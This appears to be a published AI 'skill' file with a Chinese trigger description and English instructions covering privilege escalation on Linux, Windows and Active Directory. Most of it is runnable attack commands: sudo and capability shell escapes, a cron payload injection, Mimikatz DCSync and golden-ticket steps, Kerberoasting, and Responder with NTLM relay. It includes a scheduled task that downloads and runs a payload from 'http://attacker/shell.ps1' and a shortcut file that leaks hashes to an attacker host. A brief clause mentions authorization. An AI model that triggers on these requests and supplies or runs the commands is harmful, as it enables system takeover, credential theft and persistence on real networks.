Open Skills Logo
Open Skills

Privilege Escalation Methods

该技能应在用户提出"提升权限"、"获取根权限"、"成为管理员"、"权限提升技巧"、"滥用sudo权限"、"利用SUID二进制文件"、"Kerberoasting攻击"、"票据传递攻击"、"令牌模拟攻击"等请求,或需要针对Linux/Windows系统进行后渗透权限提升指导时启用。

查看详情
name:Privilege Escalation Methodsdescription:This skill should be used when the user asks to "escalate privileges", "get root access", "become administrator", "privesc techniques", "abuse sudo", "exploit SUID binaries", "Kerberoasting", "pass-the-ticket", "token impersonation", or needs guidance on post-exploitation privilege escalation for Linux or Windows systems.metadata:author:zebbernversion:"1.1"

Privilege Escalation Methods

Purpose

Provide comprehensive techniques for escalating privileges from a low-privileged user to root/administrator access on compromised Linux and Windows systems. Essential for penetration testing post-exploitation phase and red team operations.

Inputs/Prerequisites

  • Initial low-privilege shell access on target system

  • Kali Linux or penetration testing distribution

  • Tools: Mimikatz, PowerView, PowerUpSQL, Responder, Impacket, Rubeus

  • Understanding of Windows/Linux privilege models

  • For AD attacks: Domain user credentials and network access to DC

    • Outputs/Deliverables

  • Root or Administrator shell access

  • Extracted credentials and hashes

  • Persistent access mechanisms

  • Domain compromise (for AD environments)

    • Core Techniques

    Linux Privilege Escalation

    1. Abusing Sudo Binaries

    Exploit misconfigured sudo permissions using GTFOBins techniques:

    # Check sudo permissions
    sudo -l
    Exploit common binaries

    sudo vim -c ':!/bin/bash'
    sudo find /etc/passwd -exec /bin/bash \;
    sudo awk 'BEGIN {system("/bin/bash")}'
    sudo python -c 'import pty;pty.spawn("/bin/bash")'
    sudo perl -e 'exec "/bin/bash";'
    sudo less /etc/hosts    # then type: !bash
    sudo man man            # then type: !bash
    sudo env /bin/bash

    2. Abusing Scheduled Tasks (Cron)

    # Find writable cron scripts
    ls -la /etc/cron*
    cat /etc/crontab
    Inject payload into writable script

    echo 'chmod +s /bin/bash' > /home/user/systemupdate.sh
    chmod +x /home/user/systemupdate.sh
    Wait for execution, then:

    /bin/bash -p

    3. Abusing Capabilities

    # Find binaries with capabilities
    getcap -r / 2>/dev/null
    Python with cap_setuid

    /usr/bin/python2.6 -c 'import os; os.setuid(0); os.system("/bin/bash")'
    Perl with cap_setuid

    /usr/bin/perl -e 'use POSIX (setuid); POSIX::setuid(0); exec "/bin/bash";'
    Tar with cap_dac_read_search (read any file)

    /usr/bin/tar -cvf key.tar /root/.ssh/id_rsa
    /usr/bin/tar -xvf key.tar

    4. NFS Root Squashing

    # Check for NFS shares
    showmount -e <victim_ip>
    Mount and exploit no_root_squash

    mkdir /tmp/mount
    mount -o rw,vers=2 <victim_ip>:/tmp /tmp/mount
    cd /tmp/mount
    cp /bin/bash .
    chmod +s bash

    5. MySQL Running as Root

    # If MySQL runs as root
    mysql -u root -p
    \! chmod +s /bin/bash
    exit
    /bin/bash -p

    Windows Privilege Escalation

    1. Token Impersonation

    # Using SweetPotato (SeImpersonatePrivilege)
    execute-assembly sweetpotato.exe -p beacon.exe
    Using SharpImpersonation

    SharpImpersonation.exe user:<user> technique:ImpersonateLoggedOnuser

    2. Service Abuse

    # Using PowerUp
    . .\PowerUp.ps1
    Invoke-ServiceAbuse -Name 'vds' -UserName 'domain\user1'
    Invoke-ServiceAbuse -Name 'browser' -UserName 'domain\user1'

    3. Abusing SeBackupPrivilege

    import-module .\SeBackupPrivilegeUtils.dll
    import-module .\SeBackupPrivilegeCmdLets.dll
    Copy-FileSebackupPrivilege z:\Windows\NTDS\ntds.dit C:\temp\ntds.dit

    4. Abusing SeLoadDriverPrivilege

    # Load vulnerable Capcom driver
    .\eoploaddriver.exe System\CurrentControlSet\MyService C:\test\capcom.sys
    .\ExploitCapcom.exe

    5. Abusing GPO

    .\SharpGPOAbuse.exe --AddComputerTask --Taskname "Update" 
      --Author DOMAIN\<USER> --Command "cmd.exe" 
      --Arguments "/c net user Administrator Password!@# /domain" 
      --GPOName "ADDITIONAL DC CONFIGURATION"

    Active Directory Attacks

    1. Kerberoasting

    # Using Impacket
    GetUserSPNs.py domain.local/user:password -dc-ip 10.10.10.100 -request
    Using CrackMapExec

    crackmapexec ldap 10.0.2.11 -u 'user' -p 'pass' --kdcHost 10.0.2.11 --kerberoast output.txt

    2. AS-REP Roasting

    .\Rubeus.exe asreproast

    3. Golden Ticket

    # DCSync to get krbtgt hash
    mimikatz# lsadump::dcsync /user:krbtgt
    Create golden ticket

    mimikatz# kerberos::golden /user:Administrator /domain:domain.local 
      /sid:S-1-5-21-... /rc4:<NTLM_HASH> /id:500

    4. Pass-the-Ticket

    .\Rubeus.exe asktgt /user:USER$ /rc4:<NTLM_HASH> /ptt
    klist  # Verify ticket

    5. Golden Ticket with Scheduled Tasks

    # 1. Elevate and dump credentials
    mimikatz# token::elevate
    mimikatz# vault::cred /patch
    mimikatz# lsadump::lsa /patch
    2. Create golden ticket

    mimikatz# kerberos::golden /user:Administrator /rc4:<HASH> 
      /domain:DOMAIN /sid:<SID> /ticket:ticket.kirbi
    3. Create scheduled task

    schtasks /create /S DOMAIN /SC Weekly /RU "NT Authority\SYSTEM" 
      /TN "enterprise" /TR "powershell.exe -c 'iex (iwr http://attacker/shell.ps1)'"
    schtasks /run /s DOMAIN /TN "enterprise"

    Credential Harvesting

    LLMNR Poisoning

    # Start Responder
    responder -I eth1 -v
    Create malicious shortcut (Book.url)

    [InternetShortcut]
    URL=https://facebook.com
    IconIndex=0
    IconFile=\\attacker_ip\not_found.ico

    NTLM Relay

    responder -I eth1 -v
    ntlmrelayx.py -tf targets.txt -smb2support

    Dumping with VSS

    vssadmin create shadow /for=C:
    copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\temp\
    copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\temp\

    Quick Reference

    TechniqueOSDomain RequiredTool
    Sudo Binary AbuseLinuxNoGTFOBins
    Cron Job ExploitLinuxNoManual
    Capability AbuseLinuxNogetcap
    NFS no_root_squashLinuxNomount
    Token ImpersonationWindowsNoSweetPotato
    Service AbuseWindowsNoPowerUp
    KerberoastingWindowsYesRubeus/Impacket
    AS-REP RoastingWindowsYesRubeus
    Golden TicketWindowsYesMimikatz
    Pass-the-TicketWindowsYesRubeus
    DCSyncWindowsYesMimikatz
    LLMNR PoisoningWindowsYesResponder

    Constraints

    Must:

  • Have initial shell access before attempting escalation

  • Verify target OS and environment before selecting technique

  • Use appropriate tool for domain vs local escalation

    • Must Not:

  • Attempt techniques on production systems without authorization

  • Leave persistence mechanisms without client approval

  • Ignore detection mechanisms (EDR, SIEM)

    • Should:

  • Enumerate thoroughly before exploitation

  • Document all successful escalation paths

  • Clean up artifacts after engagement

    • Examples

    Example 1: Linux Sudo to Root

    # Check sudo permissions
    $ sudo -l
    User www-data may run the following commands:
        (root) NOPASSWD: /usr/bin/vim
    Exploit vim

    $ sudo vim -c ':!/bin/bash'
    root@target:~# id
    uid=0(root) gid=0(root) groups=0(root)

    Example 2: Windows Kerberoasting

    # Request service tickets
    $ GetUserSPNs.py domain.local/jsmith:Password123 -dc-ip 10.10.10.1 -request
    Crack with hashcat

    $ hashcat -m 13100 hashes.txt rockyou.txt

    Troubleshooting

    IssueSolution
    sudo -l requires passwordTry other enumeration (SUID, cron, capabilities)
    Mimikatz blocked by AVUse Invoke-Mimikatz or SafetyKatz
    Kerberoasting returns no hashesCheck for service accounts with SPNs
    Token impersonation failsVerify SeImpersonatePrivilege is present
    NFS mount failsCheck NFS version compatibility (vers=2,3,4)

    Additional Resources

    For detailed enumeration scripts, use:

  • LinPEAS: Linux privilege escalation enumeration

  • WinPEAS: Windows privilege escalation enumeration

  • BloodHound: Active Directory attack path mapping

  • GTFOBins: Unix binary exploitation reference